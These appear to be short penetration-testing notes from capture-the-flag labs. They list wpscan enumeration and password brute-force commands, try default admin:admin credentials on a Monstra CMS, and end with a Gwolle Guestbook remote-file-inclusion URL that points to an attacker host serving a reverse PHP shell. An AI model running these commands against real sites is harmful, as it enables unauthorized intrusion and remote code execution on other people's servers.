Wordpress
Investigate
https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php
/wordpress/ ....suggests we have a very fertile ground for planting an attack. User access = shell.
/phpmyadmin/ ....suggests there is a database ready to plunder.
/info.php .....gives us Kernel, hostname and OS information immediately.wpscan
Wordpress Vuln Scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks
Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out ...ap=all plugs
Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1
Brute with known user: 'elliot'
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic
-----------------------
-----------------------
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/
admin:admin ..default works!
Try to edit themes!
They are often php
Monstra > Extends > Themes
"Helloworld" > Save ..fails
System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails
System > Settings > Maintenance Mode
<?php phpinfo(); ?> ..Save Fails
Hello ..Save Fails
-----------------------
-----------------------
searchsploit monstra
github monstra > Issues >
php code execution
Look for sqli or lfi
-----------------------
-----------------------
Wordpress RCE Exploits
wp curl trick
wp-support-plus-responsive-ticket-system
Brute Force Username - Hydra
Gwolle Guestbook RFI
TartarsauceHTB
Check your version:
Basically:
http://$IP...ajaxresponse?abspath=http://$MyIP/
Place an evil 'wp-load.php' (actually reverse PHP) on your local web server
Last updated
Was this helpful?